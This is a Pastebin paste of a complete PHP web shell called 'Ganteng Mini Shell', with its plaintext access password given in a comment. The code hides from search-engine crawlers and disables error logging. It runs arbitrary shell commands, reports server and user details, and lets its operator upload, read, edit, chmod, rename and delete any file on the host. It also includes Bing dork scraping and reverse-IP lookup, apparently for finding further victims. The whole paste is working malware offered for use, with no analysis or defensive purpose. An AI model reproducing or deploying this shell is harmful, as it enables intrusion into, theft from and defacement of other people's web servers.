API tools faq
paste
Advertisement
Guest User

Ganteng Mini Shell

a guest
May 27th, 2020
66
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.13 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "c8526c53b2d83af4be58b13c18b86680"; /*Pass=gantengXploit*/
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>gantengXploit Security</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: red;
  36. text-align: center;
  37. }
  38. header {
  39. color: green;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: dotted red;
  46. background: blue;
  47. border: 2px red;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. li {
  53. display: inline;
  54. margin: 5px;
  55. padding: 5px;
  56. }
  57. </style>
  58. </head>
  59. <center>
  60. <img src="https://j.top4top.io/p_1608f34c00.jpg "width="600"height="600"><br><br>
  61. <form method="post">
  62. <input type="password" name="pass">
  63. </form>
  64. <?php
  65. exit;
  66. }
  67. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  68. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  69. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  70. else
  71. login_shell();
  72. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  73. @ob_clean();
  74. $file = $_GET['file'];
  75. header('Content-Description: File Transfer');
  76. header('Content-Type: application/octet-stream');
  77. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  78. header('Expires: 0');
  79. header('Cache-Control: must-revalidate');
  80. header('Pragma: public');
  81. header('Content-Length: ' . filesize($file));
  82. readfile($file);
  83. exit;
  84. }
  85. ?>
  86. <?php
  87. echo '<!DOCTYPE HTML>
  88. <html>
  89. <audio src=" https://l.top4top.io/m_1588mnftd2.mp3 " autoplay="autoplay"controls="controls" loop="1" ></audio>
  90. <head>
  91. <link href="" rel="stylesheet" type="text/css">
  92. <title>Ganteng Mini Shell</title>
  93. <center>
  94. <img src=" https://j.top4top.io/p_1608f34c00.jpg " style="border-radius: 50%;" width="250"><br>
  95. </center>
  96. <link href="http://fonts.googleapis.com/css?family=Wallpoet" rel="stylesheet" type="text/css">
  97. <link href="https://fonts.googleapis.com/css2?family=Advent+Pro&display=swap" rel="stylesheet">
  98. <style>
  99. body{
  100. font-family: "advent pro";
  101. background-image: url( "https://i.ibb.co/0nRqzdr/Kntl.jpg" );
  102. color:red;
  103. background-color: rgb(0, 0, 0);
  104. background-repeat: no-repeat;
  105. background-attachment: fixed;
  106. background-size: cover;
  107. background-position: cover;
  108. background-size: cover;
  109. margin: 0;
  110. padding: 0;
  111. }
  112. #content tr:hover{
  113. background-color: #191919;
  114. text-shadow:0px 0px 10px #fff;
  115. }
  116. #content .first{
  117. background-color: #252525;
  118. color: white;
  119. }
  120. #content .first1{
  121. background-color: #252525;
  122. }
  123. table{
  124. border: 1px #ffffff dotted;
  125. }
  126. a{
  127. color:white;
  128. text-decoration: none;
  129. }
  130. a:hover{
  131. color:gold;
  132. text-shadow:0px 0px 10px #ffffff;
  133. }
  134. input,select,textarea{
  135. border: 1px #000000 solid;
  136. -moz-border-radius: 5px;
  137. -webkit-border-radius:5px;
  138. border-radius:5px;
  139. }
  140. </style>
  141. </head>
  142. <body bgcolor="white">
  143. <center><b><font color="black" ><font size=12><b>-+--GanTenG M1N1 SHELL-+-</b></font></center>
  144. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  145. <tr><td><font color="#000000">path <font color="white">: </font>';
  146. function w($dir,$perm) {
  147. if(!is_writable($dir)) {
  148. return "<font color=red>".$perm."</font>";
  149. } else {
  150. return "<font color=lime>".$perm."</font>";
  151. }
  152. }
  153. function r($dir,$perm) {
  154. if(!is_readable($dir)) {
  155. return "<font color=red>".$perm."</font>";
  156. } else {
  157. return "<font color=lime>".$perm."</font>";
  158. }
  159. }
  160. function exe($cmd) {
  161. if(function_exists('system')) {
  162. @ob_start();
  163. @system($cmd);
  164. $buff = @ob_get_contents();
  165. @ob_end_clean();
  166. return $buff;
  167. } elseif(function_exists('exec')) {
  168. @exec($cmd,$results);
  169. $buff = "";
  170. foreach($results as $result) {
  171. $buff .= $result;
  172. } return $buff;
  173. } elseif(function_exists('passthru')) {
  174. @ob_start();
  175. @passthru($cmd);
  176. $buff = @ob_get_contents();
  177. @ob_end_clean();
  178. return $buff;
  179. } elseif(function_exists('shell_exec')) {
  180. $buff = @shell_exec($cmd);
  181. return $buff;
  182. }
  183. }
  184. function perms($file){
  185. $perms = fileperms($file);
  186. if (($perms & 0xC000) == 0xC000) {
  187. // Socket
  188. $info = 's';
  189. } elseif (($perms & 0xA000) == 0xA000) {
  190. // Symbolic Link
  191. $info = 'l';
  192. } elseif (($perms & 0x8000) == 0x8000) {
  193. // Regular
  194. $info = '-';
  195. } elseif (($perms & 0x6000) == 0x6000) {
  196. // Block special
  197. $info = 'b';
  198. } elseif (($perms & 0x4000) == 0x4000) {
  199. // Directory
  200. $info = 'd';
  201. } elseif (($perms & 0x2000) == 0x2000) {
  202. // Character special
  203. $info = 'c';
  204. } elseif (($perms & 0x1000) == 0x1000) {
  205. // FIFO pipe
  206. $info = 'p';
  207. } else {
  208. // Unknown
  209. $info = 'u';
  210. }
  211. // Owner
  212. $info .= (($perms & 0x0100) ? 'r' : '-');
  213. $info .= (($perms & 0x0080) ? 'w' : '-');
  214. $info .= (($perms & 0x0040) ?
  215. (($perms & 0x0800) ? 's' : 'x' ) :
  216. (($perms & 0x0800) ? 'S' : '-'));
  217. // Group
  218. $info .= (($perms & 0x0020) ? 'r' : '-');
  219. $info .= (($perms & 0x0010) ? 'w' : '-');
  220. $info .= (($perms & 0x0008) ?
  221. (($perms & 0x0400) ? 's' : 'x' ) :
  222. (($perms & 0x0400) ? 'S' : '-'));
  223. // World
  224. $info .= (($perms & 0x0004) ? 'r' : '-');
  225. $info .= (($perms & 0x0002) ? 'w' : '-');
  226. $info .= (($perms & 0x0001) ?
  227. (($perms & 0x0200) ? 't' : 'x' ) :
  228. (($perms & 0x0200) ? 'T' : '-'));
  229. return $info;
  230. }
  231. function hdd($s) {
  232. if($s >= 1073741824)
  233. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  234. elseif($s >= 1048576)
  235. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  236. elseif($s >= 1024)
  237. return sprintf('%1.2f',$s / 1024 ) .' KB';
  238. else
  239. return $s .' B';
  240. }
  241. function ambilKata($param, $kata1, $kata2){
  242. if(strpos($param, $kata1) === FALSE) return FALSE;
  243. if(strpos($param, $kata2) === FALSE) return FALSE;
  244. $start = strpos($param, $kata1) + strlen($kata1);
  245. $end = strpos($param, $kata2, $start);
  246. $return = substr($param, $start, $end - $start);
  247. return $return;
  248. }
  249. function getsource($url) {
  250. $curl = curl_init($url);
  251. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  252. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  253. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  254. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  255. $content = curl_exec($curl);
  256. curl_close($curl);
  257. return $content;
  258. }
  259. function bing($dork) {
  260. $npage = 1;
  261. $npages = 30000;
  262. $allLinks = array();
  263. $lll = array();
  264. while($npage <= $npages) {
  265. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  266. if($x) {
  267. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  268. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  269. $npage = $npage + 10;
  270. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  271. } else break;
  272. }
  273. $URLs = array();
  274. foreach($allLinks as $url){
  275. $exp = explode("/", $url);
  276. $URLs[] = $exp[2];
  277. }
  278. $array = array_filter($URLs);
  279. $array = array_unique($array);
  280. $sss = count(array_unique($array));
  281. foreach($array as $domain) {
  282. echo $domain."\n";
  283. }
  284. }
  285. function reverse($url) {
  286. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  287. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  288. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  289. curl_setopt($ch, CURLOPT_HEADER, 0);
  290. curl_setopt($ch, CURLOPT_POST, 1);
  291. $resp = curl_exec($ch);
  292. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  293. $array = explode(",,", $resp);
  294. unset($array[0]);
  295. foreach($array as $lnk) {
  296. $lnk = "http://$lnk";
  297. $lnk = str_replace(",", "", $lnk);
  298. echo $lnk."\n";
  299. ob_flush();
  300. flush();
  301. }
  302. curl_close($ch);
  303. }
  304. if(get_magic_quotes_gpc()) {
  305. function idx_ss($array) {
  306. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  307. }
  308. $_POST = idx_ss($_POST);
  309. $_COOKIE = idx_ss($_COOKIE);
  310. }
  311.  
  312. if(isset($_GET['dir'])) {
  313. $dir = $_GET['dir'];
  314. chdir($dir);
  315. } else {
  316. $dir = getcwd();
  317. }
  318. $kernel = php_uname();
  319. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  320. $dir = str_replace("\\","/",$dir);
  321. $scdir = explode("/", $dir);
  322. $freespace = hdd(disk_free_space("/"));
  323. $total = hdd(disk_total_space("/"));
  324. $used = $total - $freespace;
  325. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=blue>OFF</font>";
  326. $ds = @ini_get("disable_functions");
  327. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  328. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  329. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  330. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  331. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  332. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  333. if(!function_exists('posix_getegid')) {
  334. $user = @get_current_user();
  335. $uid = @getmyuid();
  336. $gid = @getmygid();
  337. $group = "?";
  338. } else {
  339. $uid = @posix_getpwuid(posix_geteuid());
  340. $gid = @posix_getgrgid(posix_getegid());
  341. $user = $uid['name'];
  342. $uid = $uid['uid'];
  343. $group = $gid['name'];
  344. $gid = $gid['gid'];
  345. }
  346. echo "System: <font color=blue>".$kernel."</font><br>";
  347. echo "User: <font color=blue>".$user."</font> (".$uid.") Group: <font color=blue>".$group."</font> (".$gid.")<br>";
  348. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  349. echo "HDD: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  350. echo "Safe Mode: $sm<br>";
  351. echo "Disable Functions: $show_ds<br>";
  352. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  353. echo "Current DIR: ";
  354. foreach($scdir as $c_dir => $cdir) {
  355. echo "<a href='?dir=";
  356. for($i = 0; $i <= $c_dir; $i++) {
  357. echo $scdir[$i];
  358. if($i != $c_dir) {
  359. echo "/";
  360. }
  361. }
  362. echo "'>$cdir</a>/";
  363. }
  364. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  365. if(isset($_GET['path'])){
  366. $path = $_GET['path'];
  367. }else{
  368. $path = getcwd();
  369. }
  370. $path = str_replace('\\','/',$path);
  371. $paths = explode('/',$path);
  372.  
  373. foreach($paths as $id=>$pat){
  374. if($pat == '' && $id == 0){
  375. $a = true;
  376. echo '<a href="?path=/">/</a>';
  377. continue;
  378. }
  379. if($pat == '') continue;
  380. echo '<a href="?path=';
  381. for($i=0;$i<=$id;$i++){
  382. echo "$paths[$i]";
  383. if($i != $id) echo "/";
  384. }
  385. echo '">'.$pat.'</a>/';
  386. }
  387. echo '</td></tr><tr><td>';
  388. if(isset($_FILES['file'])){
  389. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  390. echo '<font color="gold">BERHASI COK LU GANS</font><br />';
  391. }else{
  392. echo '<font color="red">GAGAL ASU LU BURIQ</font><br/>';
  393. }
  394. }
  395. echo '<form enctype="multipart/form-data" method="POST">
  396. <font color="#000000">File Upload <font color="white">:</font> <input type="file" name="file" />
  397. <input type="submit" value="upload" />
  398. </form>
  399. </td></tr>';
  400. if(isset($_GET['filesrc'])){
  401. echo '<tr><td><font color="#000000">Current File <font color="white">: </font>';
  402. echo $_GET['filesrc'];
  403. echo '</tr></td></table><br />';
  404. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  405. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  406. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  407. if($_POST['opt'] == 'chmod'){
  408. if(isset($_POST['perm'])){
  409. if(chmod($_POST['path'],$_POST['perm'])){
  410. echo '<font color="gold">Gudd!! BuLLw0Lf Gans</font><br/>';
  411. }else{
  412. echo '<font color="red">Gagal Lu Bangsaaad!!</font><br />';
  413. }
  414. }
  415. echo '<form method="POST">
  416. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  417. <input type="hidden" name="path" value="'.$_POST['path'].'">
  418. <input type="hidden" name="opt" value="chmod">
  419. <input type="submit" value="Go" />
  420. </form>';
  421. }elseif($_POST['opt'] == 'rename'){
  422. if(isset($_POST['newname'])){
  423. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  424. echo '<font color="gold">Gudd!! BuLLw0Lf Gans</font><br/>';
  425. }else{
  426. echo '<font color="red">Gagal Njing Lu Goblokk!!</font><br />';
  427. }
  428. $_POST['name'] = $_POST['newname'];
  429. }
  430. echo '<form method="POST"><font color="#000000">New Name <font color="white">:</font>
  431. <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  432. <input type="hidden" name="path" value="'.$_POST['path'].'">
  433. <input type="hidden" name="opt" value="rename">
  434. <input type="submit" value="Go" />
  435. </form>';
  436. }elseif($_POST['opt'] == 'edit'){
  437. if(isset($_POST['src'])){
  438. $fp = fopen($_POST['path'],'w');
  439. if(fwrite($fp,$_POST['src'])){
  440. echo '<font color="gold">Behasil!! BuLLw0Lf Gans</font><br/>';
  441. }else{
  442. echo '<font color="red">Gagal Njing Lu Goblok!!</font><br/>';
  443. }
  444. fclose($fp);
  445. }
  446. echo '<form color="#000000" method="POST">
  447. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  448. <input type="hidden" name="path" value="'.$_POST['path'].'">
  449. <input type="hidden" name="opt" value="edit">
  450. <input type="submit" value="Save" />
  451. </form>';
  452. }
  453. echo '</center>';
  454. }else{
  455. echo '</table><br/><center>';
  456. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  457. if($_POST['type'] == 'dir'){
  458. if(rmdir($_POST['path'])){
  459. echo '<font color="lime">Terhapus!! Gud!</font><br/>';
  460. }else{
  461. echo '<font color="red">Mampoos Gabisa Hapus Director!!</font><br/>';
  462. }
  463. }elseif($_POST['type'] == 'file'){
  464. if(unlink($_POST['path'])){
  465. echo '<font color="lime">Pinter Lu Gud!!</font><br/>';
  466. }else{
  467. echo '<font color="red">Mampos Gabisa Dihapus!!</font><br/>';
  468. }
  469. }
  470. }
  471. echo '</center>';
  472. $scandir = scandir($path);
  473. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  474. <tr class="first">
  475. <td><center>Name</peller></center></td>
  476. <td><center>Size</peller></center></td>
  477. <td><center>Permission</peller></center></td>
  478. <td><center>Modify</peller></center></td>
  479. </tr>';
  480.  
  481. foreach($scandir as $dir){
  482. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  483. echo '<tr>
  484. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  485. <td><center>--</center></td>
  486. <td><center>';
  487. if(is_writable($path.'/'.$dir)) echo '<font color="lime">';
  488. elseif(!is_readable($path.'/'.$dir)) echo '<font color="white">';
  489. echo perms($path.'/'.$dir);
  490. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  491.  
  492. echo '</center></td>
  493. <td><center><form method="POST" action="?option&path='.$path.'">
  494. <select name="opt">
  495. <option value="">Select</option>
  496. <option value="Hapus??">Delete</option>
  497. <option value="chmod">Chmod</option>
  498. <option value="GantiNama?">Rename</option>
  499. </select>
  500. <input type="hidden" name="type" value="dir">
  501. <input type="hidden" name="name" value="'.$dir.'">
  502. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  503. <input type="submit" value=">">
  504. </form></center></td>
  505. </tr>';
  506. }
  507. echo '<tr class="first1"><td></td><td></td><td></td><td></td></tr>';
  508. foreach($scandir as $file){
  509. if(!is_file($path.'/'.$file)) continue;
  510. $size = filesize($path.'/'.$file)/1024;
  511. $size = round($size,3);
  512. if($size >= 1024){
  513. $size = round($size/1024,2).' MB';
  514. }else{
  515. $size = $size.' KB';
  516. }
  517.  
  518. echo '<tr>
  519. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  520. <td><center>'.$size.'</center></td>
  521. <td><center>';
  522. if(is_writable($path.'/'.$file)) echo '<font color="lime">';
  523. elseif(!is_readable($path.'/'.$file)) echo '<font color="white">';
  524. echo perms($path.'/'.$file);
  525. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  526. echo '</center></td>
  527. <td><center><form method="POST" action="?option&path='.$path.'">
  528. <select name="opt">
  529. <option value="">Select</option>
  530. <option value="Hapus">Delete</option>
  531. <option value="chmod">Chmod</option>
  532. <option value="Gantinama">Rename</option>
  533. <option value="edit">Edit</option>
  534. </select>
  535. <input type="hidden" name="type" value="file">
  536. <input type="hidden" name="name" value="'.$file.'">
  537. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  538. <input type="submit" value=">">
  539. </form></center></td>
  540. </tr>';
  541. }
  542. echo '</table>
  543. </div>';
  544. }
  545. echo '<font color="#000000" size="2px"><center><br/><b>© 2019-0wned By</font> <font color="#252525"> ||</font> <font color="gold">#_/|BuLLw0Lf-kun||#</a></center></font>
  546.  
  547. </body>
  548. </html>';
  549.  
  550. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!